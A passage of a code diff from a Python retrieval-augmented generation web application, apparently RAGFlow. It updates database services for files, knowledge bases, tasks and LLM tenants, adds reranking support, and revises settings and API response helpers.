else:
|
||||
parent_folders.append(file)
|
||||
break
|
||||
return parent_folders
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert(cls, file):
|
||||
if not cls.save(**file):
|
||||
raise RuntimeError("Database error (File)!")
|
||||
e, file = cls.get_by_id(file["id"])
|
||||
if not e:
|
||||
raise RuntimeError("Database error (File retrieval)!")
|
||||
return file
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete(cls, file):
|
||||
return cls.delete_by_id(file.id)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete_by_pf_id(cls, folder_id):
|
||||
return cls.model.delete().where(cls.model.parent_id == folder_id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete_folder_by_pf_id(cls, user_id, folder_id):
|
||||
try:
|
||||
files = cls.model.select().where((cls.model.tenant_id == user_id)
|
||||
& (cls.model.parent_id == folder_id))
|
||||
for file in files:
|
||||
cls.delete_folder_by_pf_id(user_id, file.id)
|
||||
return cls.model.delete().where((cls.model.tenant_id == user_id)
|
||||
& (cls.model.id == folder_id)).execute(),
|
||||
except Exception as e:
|
||||
print(e)
|
||||
raise RuntimeError("Database error (File retrieval)!")
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_file_count(cls, tenant_id):
|
||||
files = cls.model.select(cls.model.id).where(cls.model.tenant_id == tenant_id)
|
||||
return len(files)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_folder_size(cls, folder_id):
|
||||
size = 0
|
||||
|
||||
def dfs(parent_id):
|
||||
nonlocal size
|
||||
for f in cls.model.select(*[cls.model.id, cls.model.size, cls.model.type]).where(
|
||||
cls.model.parent_id == parent_id, cls.model.id != parent_id):
|
||||
size += f.size
|
||||
if f.type == FileType.FOLDER.value:
|
||||
dfs(f.id)
|
||||
|
||||
dfs(folder_id)
|
||||
return size
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def add_file_from_kb(cls, doc, kb_folder_id, tenant_id):
|
||||
for _ in File2DocumentService.get_by_document_id(doc["id"]): return
|
||||
file = {
|
||||
"id": get_uuid(),
|
||||
"parent_id": kb_folder_id,
|
||||
"tenant_id": tenant_id,
|
||||
"created_by": tenant_id,
|
||||
"name": doc["name"],
|
||||
"type": doc["type"],
|
||||
"size": doc["size"],
|
||||
"location": doc["location"],
|
||||
"source_type": FileSource.KNOWLEDGEBASE
|
||||
}
|
||||
cls.save(**file)
|
||||
File2DocumentService.save(**{"id": get_uuid(), "file_id": file["id"], "document_id": doc["id"]})
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def move_file(cls, file_ids, folder_id):
|
||||
try:
|
||||
cls.filter_update((cls.model.id << file_ids, ), { 'parent_id': folder_id })
|
||||
except Exception as e:
|
||||
print(e)
|
||||
raise RuntimeError("Database error (File move)!")
|
||||
@ -1,67 +0,0 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from api.db import TenantPermission
|
||||
from api.db.db_models import DB, Tenant
|
||||
from api.db.db_models import Knowledgebase
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db import StatusEnum
|
||||
|
||||
|
||||
class KnowledgebaseService(CommonService):
|
||||
model = Knowledgebase
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_tenant_ids(cls, joined_tenant_ids, user_id,
|
||||
page_number, items_per_page, orderby, desc):
|
||||
kbs = cls.model.select().where(
|
||||
((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
|
||||
TenantPermission.TEAM.value)) | (cls.model.tenant_id == user_id))
|
||||
& (cls.model.status == StatusEnum.VALID.value)
|
||||
)
|
||||
if desc:
|
||||
kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
|
||||
else:
|
||||
kbs = kbs.order_by(cls.model.getter_by(orderby).asc())
|
||||
|
||||
kbs = kbs.paginate(page_number, items_per_page)
|
||||
|
||||
return list(kbs.dicts())
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_detail(cls, kb_id):
|
||||
fields = [
|
||||
cls.model.id,
|
||||
Tenant.embd_id,
|
||||
cls.model.avatar,
|
||||
cls.model.name,
|
||||
cls.model.description,
|
||||
cls.model.permission,
|
||||
cls.model.doc_num,
|
||||
cls.model.token_num,
|
||||
cls.model.chunk_num,
|
||||
cls.model.parser_id]
|
||||
kbs = cls.model.select(*fields).join(Tenant, on=((Tenant.id == cls.model.tenant_id)&(Tenant.status== StatusEnum.VALID.value))).where(
|
||||
(cls.model.id == kb_id),
|
||||
(cls.model.status == StatusEnum.VALID.value)
|
||||
)
|
||||
if not kbs:
|
||||
return
|
||||
d = kbs[0].to_dict()
|
||||
d["embd_id"] = kbs[0].tenant.embd_id
|
||||
return d
|
||||
@ -27,7 +27,8 @@ class KnowledgebaseService(CommonService):
|
||||
page_number, items_per_page, orderby, desc):
|
||||
kbs = cls.model.select().where(
|
||||
((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
|
||||
TenantPermission.TEAM.value)) | (cls.model.tenant_id == user_id))
|
||||
TenantPermission.TEAM.value)) | (
|
||||
cls.model.tenant_id == user_id))
|
||||
& (cls.model.status == StatusEnum.VALID.value)
|
||||
)
|
||||
if desc:
|
||||
@ -39,6 +40,31 @@ class KnowledgebaseService(CommonService):
|
||||
|
||||
return list(kbs.dicts())
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_tenant_ids_by_offset(cls, joined_tenant_ids, user_id, offset, count, orderby, desc):
|
||||
kbs = cls.model.select().where(
|
||||
((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
|
||||
TenantPermission.TEAM.value)) | (
|
||||
cls.model.tenant_id == user_id))
|
||||
& (cls.model.status == StatusEnum.VALID.value)
|
||||
)
|
||||
if desc:
|
||||
kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
|
||||
else:
|
||||
kbs = kbs.order_by(cls.model.getter_by(orderby).asc())
|
||||
|
||||
kbs = list(kbs.dicts())
|
||||
|
||||
kbs_length = len(kbs)
|
||||
if offset < 0 or offset > kbs_length:
|
||||
raise IndexError("Offset is out of the valid range.")
|
||||
|
||||
if count == -1:
|
||||
return kbs[offset:]
|
||||
|
||||
return kbs[offset:offset+count]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_detail(cls, kb_id):
|
||||
@ -56,7 +82,8 @@ class KnowledgebaseService(CommonService):
|
||||
cls.model.chunk_num,
|
||||
cls.model.parser_id,
|
||||
cls.model.parser_config]
|
||||
kbs = cls.model.select(*fields).join(Tenant, on=((Tenant.id == cls.model.tenant_id) & (Tenant.status == StatusEnum.VALID.value))).where(
|
||||
kbs = cls.model.select(*fields).join(Tenant, on=(
|
||||
(Tenant.id == cls.model.tenant_id) & (Tenant.status == StatusEnum.VALID.value))).where(
|
||||
(cls.model.id == kb_id),
|
||||
(cls.model.status == StatusEnum.VALID.value)
|
||||
)
|
||||
@ -86,6 +113,7 @@ class KnowledgebaseService(CommonService):
|
||||
old[k] = list(set(old[k] + v))
|
||||
else:
|
||||
old[k] = v
|
||||
|
||||
dfs_update(m.parser_config, config)
|
||||
cls.update_by_id(id, {"parser_config": m.parser_config})
|
||||
|
||||
@ -97,3 +125,20 @@ class KnowledgebaseService(CommonService):
|
||||
if k.parser_config and "field_map" in k.parser_config:
|
||||
conf.update(k.parser_config["field_map"])
|
||||
return conf
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_name(cls, kb_name, tenant_id):
|
||||
kb = cls.model.select().where(
|
||||
(cls.model.name == kb_name)
|
||||
& (cls.model.tenant_id == tenant_id)
|
||||
& (cls.model.status == StatusEnum.VALID.value)
|
||||
)
|
||||
if kb:
|
||||
return True, kb[0]
|
||||
return False, None
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_all_ids(cls):
|
||||
return [m["id"] for m in cls.model.select(cls.model.id).dicts()]
|
||||
|
||||
@ -15,7 +15,7 @@
|
||||
#
|
||||
from api.db.services.user_service import TenantService
|
||||
from api.settings import database_logger
|
||||
from rag.llm import EmbeddingModel, CvModel, ChatModel
|
||||
from rag.llm import EmbeddingModel, CvModel, ChatModel, RerankModel
|
||||
from api.db import LLMType
|
||||
from api.db.db_models import DB, UserTenant
|
||||
from api.db.db_models import LLMFactories, LLM, TenantLLM
|
||||
@ -73,21 +73,25 @@ class TenantLLMService(CommonService):
|
||||
mdlnm = tenant.img2txt_id
|
||||
elif llm_type == LLMType.CHAT.value:
|
||||
mdlnm = tenant.llm_id if not llm_name else llm_name
|
||||
elif llm_type == LLMType.RERANK:
|
||||
mdlnm = tenant.rerank_id if not llm_name else llm_name
|
||||
else:
|
||||
assert False, "LLM type error"
|
||||
|
||||
model_config = cls.get_api_key(tenant_id, mdlnm)
|
||||
if model_config: model_config = model_config.to_dict()
|
||||
if not model_config:
|
||||
if llm_type == LLMType.EMBEDDING.value:
|
||||
llm = LLMService.query(llm_name=llm_name)
|
||||
if llm and llm[0].fid in ["QAnything", "FastEmbed"]:
|
||||
model_config = {"llm_factory": llm[0].fid, "api_key":"", "llm_name": llm_name, "api_base": ""}
|
||||
if llm_type in [LLMType.EMBEDDING, LLMType.RERANK]:
|
||||
llm = LLMService.query(llm_name=llm_name if llm_name else mdlnm)
|
||||
if llm and llm[0].fid in ["Youdao", "FastEmbed", "BAAI"]:
|
||||
model_config = {"llm_factory": llm[0].fid, "api_key":"", "llm_name": llm_name if llm_name else mdlnm, "api_base": ""}
|
||||
if not model_config:
|
||||
if llm_name == "flag-embedding":
|
||||
model_config = {"llm_factory": "Tongyi-Qianwen", "api_key": "",
|
||||
"llm_name": llm_name, "api_base": ""}
|
||||
else:
|
||||
if not mdlnm:
|
||||
raise LookupError(f"Type of {llm_type} model is not set.")
|
||||
raise LookupError("Model({}) not authorized".format(mdlnm))
|
||||
|
||||
if llm_type == LLMType.EMBEDDING.value:
|
||||
@ -96,6 +100,12 @@ class TenantLLMService(CommonService):
|
||||
return EmbeddingModel[model_config["llm_factory"]](
|
||||
model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])
|
||||
|
||||
if llm_type == LLMType.RERANK:
|
||||
if model_config["llm_factory"] not in RerankModel:
|
||||
return
|
||||
return RerankModel[model_config["llm_factory"]](
|
||||
model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])
|
||||
|
||||
if llm_type == LLMType.IMAGE2TEXT.value:
|
||||
if model_config["llm_factory"] not in CvModel:
|
||||
return
|
||||
@ -125,14 +135,31 @@ class TenantLLMService(CommonService):
|
||||
mdlnm = tenant.img2txt_id
|
||||
elif llm_type == LLMType.CHAT.value:
|
||||
mdlnm = tenant.llm_id if not llm_name else llm_name
|
||||
elif llm_type == LLMType.RERANK:
|
||||
mdlnm = tenant.llm_id if not llm_name else llm_name
|
||||
else:
|
||||
assert False, "LLM type error"
|
||||
|
||||
num = cls.model.update(used_tokens=cls.model.used_tokens + used_tokens)\
|
||||
num = 0
|
||||
try:
|
||||
for u in cls.query(tenant_id = tenant_id, llm_name=mdlnm):
|
||||
num += cls.model.update(used_tokens = u.used_tokens + used_tokens)\
|
||||
.where(cls.model.tenant_id == tenant_id, cls.model.llm_name == mdlnm)\
|
||||
.execute()
|
||||
except Exception as e:
|
||||
pass
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_openai_models(cls):
|
||||
objs = cls.model.select().where(
|
||||
(cls.model.llm_factory == "OpenAI"),
|
||||
~(cls.model.llm_name == "text-embedding-3-small"),
|
||||
~(cls.model.llm_name == "text-embedding-3-large")
|
||||
).dicts()
|
||||
return list(objs)
|
||||
|
||||
|
||||
class LLMBundle(object):
|
||||
def __init__(self, tenant_id, llm_type, llm_name=None, lang="Chinese"):
|
||||
@ -143,6 +170,10 @@ class LLMBundle(object):
|
||||
tenant_id, llm_type, llm_name, lang=lang)
|
||||
assert self.mdl, "Can't find mole for {}/{}/{}".format(
|
||||
tenant_id, llm_type, llm_name)
|
||||
self.max_length = 512
|
||||
for lm in LLMService.query(llm_name=llm_name):
|
||||
self.max_length = lm.max_tokens
|
||||
break
|
||||
|
||||
def encode(self, texts: list, batch_size=32):
|
||||
emd, used_tokens = self.mdl.encode(texts, batch_size)
|
||||
@ -160,6 +191,14 @@ class LLMBundle(object):
|
||||
"Can't update token usage for {}/EMBEDDING".format(self.tenant_id))
|
||||
return emd, used_tokens
|
||||
|
||||
def similarity(self, query: str, texts: list):
|
||||
sim, used_tokens = self.mdl.similarity(query, texts)
|
||||
if not TenantLLMService.increase_usage(
|
||||
self.tenant_id, self.llm_type, used_tokens):
|
||||
database_logger.error(
|
||||
"Can't update token usage for {}/RERANK".format(self.tenant_id))
|
||||
return sim, used_tokens
|
||||
|
||||
def describe(self, image, max_tokens=300):
|
||||
txt, used_tokens = self.mdl.describe(image, max_tokens)
|
||||
if not TenantLLMService.increase_usage(
|
||||
@ -170,8 +209,18 @@ class LLMBundle(object):
|
||||
|
||||
def chat(self, system, history, gen_conf):
|
||||
txt, used_tokens = self.mdl.chat(system, history, gen_conf)
|
||||
if TenantLLMService.increase_usage(
|
||||
if not TenantLLMService.increase_usage(
|
||||
self.tenant_id, self.llm_type, used_tokens, self.llm_name):
|
||||
database_logger.error(
|
||||
"Can't update token usage for {}/CHAT".format(self.tenant_id))
|
||||
return txt
|
||||
|
||||
def chat_streamly(self, system, history, gen_conf):
|
||||
for txt in self.mdl.chat_streamly(system, history, gen_conf):
|
||||
if isinstance(txt, int):
|
||||
if not TenantLLMService.increase_usage(
|
||||
self.tenant_id, self.llm_type, txt, self.llm_name):
|
||||
database_logger.error(
|
||||
"Can't update token usage for {}/CHAT".format(self.tenant_id))
|
||||
return
|
||||
yield txt
|
||||
|
||||
@ -13,12 +13,22 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from peewee import Expression
|
||||
from api.db.db_models import DB
|
||||
import os
|
||||
import random
|
||||
|
||||
from api.db.db_utils import bulk_insert_into_db
|
||||
from deepdoc.parser import PdfParser
|
||||
from peewee import JOIN
|
||||
from api.db.db_models import DB, File2Document, File
|
||||
from api.db import StatusEnum, FileType, TaskStatus
|
||||
from api.db.db_models import Task, Document, Knowledgebase, Tenant
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.utils import current_timestamp, get_uuid
|
||||
from deepdoc.parser.excel_parser import RAGFlowExcelParser
|
||||
from rag.settings import SVR_QUEUE_NAME
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from rag.utils.redis_conn import REDIS_CONN
|
||||
|
||||
|
||||
class TaskService(CommonService):
|
||||
@ -26,7 +36,7 @@ class TaskService(CommonService):
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_tasks(cls, tm, mod=0, comm=1, items_per_page=64):
|
||||
def get_tasks(cls, task_id):
|
||||
fields = [
|
||||
cls.model.id,
|
||||
cls.model.doc_id,
|
||||
@ -44,21 +54,40 @@ class TaskService(CommonService):
|
||||
Knowledgebase.embd_id,
|
||||
Tenant.img2txt_id,
|
||||
Tenant.asr_id,
|
||||
Tenant.llm_id,
|
||||
cls.model.update_time]
|
||||
docs = cls.model.select(*fields) \
|
||||
.join(Document, on=(cls.model.doc_id == Document.id)) \
|
||||
.join(Knowledgebase, on=(Document.kb_id == Knowledgebase.id)) \
|
||||
.join(Tenant, on=(Knowledgebase.tenant_id == Tenant.id))\
|
||||
.join(Tenant, on=(Knowledgebase.tenant_id == Tenant.id)) \
|
||||
.where(cls.model.id == task_id)
|
||||
docs = list(docs.dicts())
|
||||
if not docs: return []
|
||||
|
||||
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + "Task has been received.",
|
||||
progress=random.random() / 10.).where(
|
||||
cls.model.id == docs[0]["id"]).execute()
|
||||
return docs
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_ongoing_doc_name(cls):
|
||||
with DB.lock("get_task", -1):
|
||||
docs = cls.model.select(*[Document.id, Document.kb_id, Document.location, File.parent_id]) \
|
||||
.join(Document, on=(cls.model.doc_id == Document.id)) \
|
||||
.join(File2Document, on=(File2Document.document_id == Document.id), join_type=JOIN.LEFT_OUTER) \
|
||||
.join(File, on=(File2Document.file_id == File.id), join_type=JOIN.LEFT_OUTER) \
|
||||
.where(
|
||||
Document.status == StatusEnum.VALID.value,
|
||||
Document.run == TaskStatus.RUNNING.value,
|
||||
~(Document.type == FileType.VIRTUAL.value),
|
||||
cls.model.progress == 0,
|
||||
cls.model.update_time >= tm,
|
||||
(Expression(cls.model.create_time, "%%", comm) == mod))\
|
||||
.order_by(cls.model.update_time.asc())\
|
||||
.paginate(1, items_per_page)
|
||||
return list(docs.dicts())
|
||||
cls.model.progress < 1,
|
||||
cls.model.create_time >= current_timestamp() - 1000 * 600
|
||||
)
|
||||
docs = list(docs.dicts())
|
||||
if not docs: return []
|
||||
|
||||
return list(set([(d["parent_id"] if d["parent_id"] else d["kb_id"], d["location"]) for d in docs]))
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
@ -69,14 +98,76 @@ class TaskService(CommonService):
|
||||
return doc.run == TaskStatus.CANCEL.value or doc.progress < 0
|
||||
except Exception as e:
|
||||
pass
|
||||
return True
|
||||
return False
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_progress(cls, id, info):
|
||||
if os.environ.get("MACOS"):
|
||||
if info["progress_msg"]:
|
||||
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
|
||||
cls.model.id == id).execute()
|
||||
if "progress" in info:
|
||||
cls.model.update(progress=info["progress"]).where(
|
||||
cls.model.id == id).execute()
|
||||
return
|
||||
|
||||
with DB.lock("update_progress", -1):
|
||||
if info["progress_msg"]:
|
||||
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
|
||||
cls.model.id == id).execute()
|
||||
if "progress" in info:
|
||||
cls.model.update(progress=info["progress"]).where(
|
||||
cls.model.id == id).execute()
|
||||
|
||||
|
||||
def queue_tasks(doc, bucket, name):
|
||||
def new_task():
|
||||
nonlocal doc
|
||||
return {
|
||||
"id": get_uuid(),
|
||||
"doc_id": doc["id"]
|
||||
}
|
||||
tsks = []
|
||||
|
||||
if doc["type"] == FileType.PDF.value:
|
||||
file_bin = MINIO.get(bucket, name)
|
||||
do_layout = doc["parser_config"].get("layout_recognize", True)
|
||||
pages = PdfParser.total_page_number(doc["name"], file_bin)
|
||||
page_size = doc["parser_config"].get("task_page_size", 12)
|
||||
if doc["parser_id"] == "paper":
|
||||
page_size = doc["parser_config"].get("task_page_size", 22)
|
||||
if doc["parser_id"] == "one":
|
||||
page_size = 1000000000
|
||||
if not do_layout:
|
||||
page_size = 1000000000
|
||||
page_ranges = doc["parser_config"].get("pages")
|
||||
if not page_ranges:
|
||||
page_ranges = [(1, 100000)]
|
||||
for s, e in page_ranges:
|
||||
s -= 1
|
||||
s = max(0, s)
|
||||
e = min(e - 1, pages)
|
||||
for p in range(s, e, page_size):
|
||||
task = new_task()
|
||||
task["from_page"] = p
|
||||
task["to_page"] = min(p + page_size, e)
|
||||
tsks.append(task)
|
||||
|
||||
elif doc["parser_id"] == "table":
|
||||
file_bin = MINIO.get(bucket, name)
|
||||
rn = RAGFlowExcelParser.row_number(
|
||||
doc["name"], file_bin)
|
||||
for i in range(0, rn, 3000):
|
||||
task = new_task()
|
||||
task["from_page"] = i
|
||||
task["to_page"] = min(i + 3000, rn)
|
||||
tsks.append(task)
|
||||
else:
|
||||
tsks.append(new_task())
|
||||
|
||||
bulk_insert_into_db(Task, tsks, True)
|
||||
DocumentService.begin2parse(doc["id"])
|
||||
|
||||
for t in tsks:
|
||||
assert REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=t), "Can't access Redis. Please check the Redis' status."
|
||||
|
||||
@ -93,6 +93,7 @@ class TenantService(CommonService):
|
||||
cls.model.name,
|
||||
cls.model.llm_id,
|
||||
cls.model.embd_id,
|
||||
cls.model.rerank_id,
|
||||
cls.model.asr_id,
|
||||
cls.model.img2txt_id,
|
||||
cls.model.parser_ids,
|
||||
|
||||
@ -18,10 +18,14 @@ import logging
|
||||
import os
|
||||
import signal
|
||||
import sys
|
||||
import time
|
||||
import traceback
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
|
||||
from werkzeug.serving import run_simple
|
||||
from api.apps import app
|
||||
from api.db.runtime_config import RuntimeConfig
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.settings import (
|
||||
HOST, HTTP_PORT, access_logger, database_logger, stat_logger,
|
||||
)
|
||||
@ -31,6 +35,16 @@ from api.db.db_models import init_database_tables as init_web_db
|
||||
from api.db.init_data import init_web_data
|
||||
from api.versions import get_versions
|
||||
|
||||
|
||||
def update_progress():
|
||||
while True:
|
||||
time.sleep(1)
|
||||
try:
|
||||
DocumentService.update_progress()
|
||||
except Exception as e:
|
||||
stat_logger.error("update_progress exception:" + str(e))
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
print("""
|
||||
____ ______ __
|
||||
@ -71,6 +85,9 @@ if __name__ == '__main__':
|
||||
peewee_logger.addHandler(database_logger.handlers[0])
|
||||
peewee_logger.setLevel(database_logger.level)
|
||||
|
||||
thr = ThreadPoolExecutor(max_workers=1)
|
||||
thr.submit(update_progress)
|
||||
|
||||
# start http server
|
||||
try:
|
||||
stat_logger.info("RAG Flow http server start...")
|
||||
|
||||
@ -32,7 +32,7 @@ access_logger = getLogger("access")
|
||||
database_logger = getLogger("database")
|
||||
chat_logger = getLogger("chat")
|
||||
|
||||
from rag.utils import ELASTICSEARCH
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.nlp import search
|
||||
from api.utils import get_base_config, decrypt_database_config
|
||||
|
||||
@ -69,6 +69,12 @@ default_llm = {
|
||||
"image2text_model": "gpt-4-vision-preview",
|
||||
"asr_model": "whisper-1",
|
||||
},
|
||||
"Azure-OpenAI": {
|
||||
"chat_model": "azure-gpt-35-turbo",
|
||||
"embedding_model": "azure-text-embedding-ada-002",
|
||||
"image2text_model": "azure-gpt-4-vision-preview",
|
||||
"asr_model": "azure-whisper-1",
|
||||
},
|
||||
"ZHIPU-AI": {
|
||||
"chat_model": "glm-3-turbo",
|
||||
"embedding_model": "embedding-2",
|
||||
@ -86,6 +92,25 @@ default_llm = {
|
||||
"embedding_model": "",
|
||||
"image2text_model": "",
|
||||
"asr_model": "",
|
||||
},
|
||||
"DeepSeek": {
|
||||
"chat_model": "deepseek-chat",
|
||||
"embedding_model": "",
|
||||
"image2text_model": "",
|
||||
"asr_model": "",
|
||||
},
|
||||
"VolcEngine": {
|
||||
"chat_model": "",
|
||||
"embedding_model": "",
|
||||
"image2text_model": "",
|
||||
"asr_model": "",
|
||||
},
|
||||
"BAAI": {
|
||||
"chat_model": "",
|
||||
"embedding_model": "BAAI/bge-large-zh-v1.5",
|
||||
"image2text_model": "",
|
||||
"asr_model": "",
|
||||
"rerank_model": "BAAI/bge-reranker-v2-m3",
|
||||
}
|
||||
}
|
||||
LLM = get_base_config("user_default_llm", {})
|
||||
@ -98,7 +123,8 @@ if LLM_FACTORY not in default_llm:
|
||||
f"LLM factory {LLM_FACTORY} has not supported yet, switch to 'Tongyi-Qianwen/QWen' automatically, and please check the API_KEY in service_conf.yaml.")
|
||||
LLM_FACTORY = "Tongyi-Qianwen"
|
||||
CHAT_MDL = default_llm[LLM_FACTORY]["chat_model"]
|
||||
EMBEDDING_MDL = default_llm[LLM_FACTORY]["embedding_model"]
|
||||
EMBEDDING_MDL = default_llm["BAAI"]["embedding_model"]
|
||||
RERANK_MDL = default_llm["BAAI"]["rerank_model"]
|
||||
ASR_MDL = default_llm[LLM_FACTORY]["asr_model"]
|
||||
IMAGE2TEXT_MDL = default_llm[LLM_FACTORY]["image2text_model"]
|
||||
|
||||
@ -152,6 +178,7 @@ CLIENT_AUTHENTICATION = AUTHENTICATION_CONF.get(
|
||||
"switch", False)
|
||||
HTTP_APP_KEY = AUTHENTICATION_CONF.get("client", {}).get("http_app_key")
|
||||
GITHUB_OAUTH = get_base_config("oauth", {}).get("github")
|
||||
FEISHU_OAUTH = get_base_config("oauth", {}).get("feishu")
|
||||
WECHAT_OAUTH = get_base_config("oauth", {}).get("wechat")
|
||||
|
||||
# site
|
||||
@ -218,4 +245,5 @@ class RetCode(IntEnum, CustomEnum):
|
||||
RUNNING = 106
|
||||
PERMISSION_ERROR = 108
|
||||
AUTHENTICATION_ERROR = 109
|
||||
UNAUTHORIZED = 401
|
||||
SERVER_ERROR = 500
|
||||
|
||||
@ -25,7 +25,6 @@ from flask import (
|
||||
from werkzeug.http import HTTP_STATUS_CODES
|
||||
|
||||
from api.utils import json_dumps
|
||||
from api.versions import get_rag_version
|
||||
from api.settings import RetCode
|
||||
from api.settings import (
|
||||
REQUEST_MAX_WAIT_SEC, REQUEST_WAIT_SEC,
|
||||
@ -39,7 +38,6 @@ from base64 import b64encode
|
||||
from hmac import HMAC
|
||||
from urllib.parse import quote, urlencode
|
||||
|
||||
|
||||
requests.models.complexjson.dumps = functools.partial(
|
||||
json.dumps, cls=CustomJSONEncoder)
|
||||
|
||||
@ -84,9 +82,6 @@ def request(**kwargs):
|
||||
return sess.send(prepped, stream=stream, timeout=timeout)
|
||||
|
||||
|
||||
rag_version = get_rag_version() or ''
|
||||
|
||||
|
||||
def get_exponential_backoff_interval(retries, full_jitter=False):
|
||||
"""Calculate the exponential backoff wait time."""
|
||||
# Will be zero if factor equals 0
|
||||
@ -149,7 +144,7 @@ def server_error_response(e):
|
||||
if len(e.args) > 1:
|
||||
return get_json_result(
|
||||
retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e.args[0]), data=e.args[1])
|
||||
if repr(e).find("index_not_found_exception") >=0:
|
||||
if repr(e).find("index_not_found_exception") >= 0:
|
||||
return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg="No chunk found, please upload file and parse it.")
|
||||
|
||||
return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e))
|
||||
@ -239,3 +234,36 @@ def cors_reponse(retcode=RetCode.SUCCESS,
|
||||
response.headers["Access-Control-Allow-Headers"] = "*"
|
||||
response.headers["Access-Control-Expose-Headers"] = "Authorization"
|
||||
return response
|
||||
|
||||
def construct_result(code=RetCode.DATA_ERROR, message='data is missing'):
|
||||
import re
|
||||
result_dict = {"code": code, "message": re.sub(r"rag", "seceum", message, flags=re.IGNORECASE)}
|
||||
response = {}
|
||||
for key, value in result_dict.items():
|
||||
if value is None and key != "code":
|
||||
continue
|
||||
else:
|
||||
response[key] = value
|
||||
return jsonify(response)
|
||||
|
||||
|
||||
def construct_json_result(code=RetCode.SUCCESS, message='success', data=None):
|
||||
if data is None:
|
||||
return jsonify({"code": code, "message": message})
|
||||
else:
|
||||
return jsonify({"code": code, "message": message, "data": data})
|
||||
|
||||
|
||||
def construct_error_response(e):
|
||||
stat_logger.exception(e)
|
||||
try:
|
||||
if e.code == 401:
|
||||
return construct_json_result(code=RetCode.UNAUTHORIZED, message=repr(e))
|
||||
except BaseException:
|
||||
pass
|
||||
if len(e.args) > 1:
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e.args[0]), data=e.args[1])
|
||||
if repr(e).find("index_not_found_exception") >=0:
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message="No chunk found, please upload file and parse it.")
|
||||
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e))
|
||||
|
||||
@ -19,7 +19,7 @@ import os
|
||||
import re
|
||||
from io import BytesIO
|
||||
|
||||
import fitz
|
||||
import pdfplumber
|
||||
from PIL import Image
|
||||
from cachetools import LRUCache, cached
|
||||
from ruamel.yaml import YAML
|
||||
@ -66,6 +66,15 @@ def get_rag_python_directory(*args):
|
||||
return get_rag_directory("python", *args)
|
||||
|
||||
|
||||
def get_home_cache_dir():
|
||||
dir = os.path.join(os.path.expanduser('~'), ".ragflow")
|
||||
try:
|
||||
os.mkdir(dir)
|
||||
except OSError as error:
|
||||
pass
|
||||
return dir
|
||||
|
||||
|
||||
@cached(cache=LRUCache(maxsize=10))
|
||||
def load_json_conf(conf_path):
|
||||
if os.path.isabs(conf_path):
|
||||
@ -147,7 +156,7 @@ def filename_type(filename):
|
||||
return FileType.PDF.value
|
||||
|
||||
if re.match(
|
||||
r".*\.(docx|doc|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp|pages|numbers|key|md)$", filename):
|
||||
r".*\.(doc|docx|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp|pages|numbers|key|md|py|js|java|c|cpp|h|php|go|ts|sh|cs|kt|html)$", filename):
|
||||
return FileType.DOC.value
|
||||
|
||||
if re.match(
|
||||
@ -155,17 +164,17 @@ def filename_type(filename):
|
||||
return FileType.AURAL.value
|
||||
|
||||
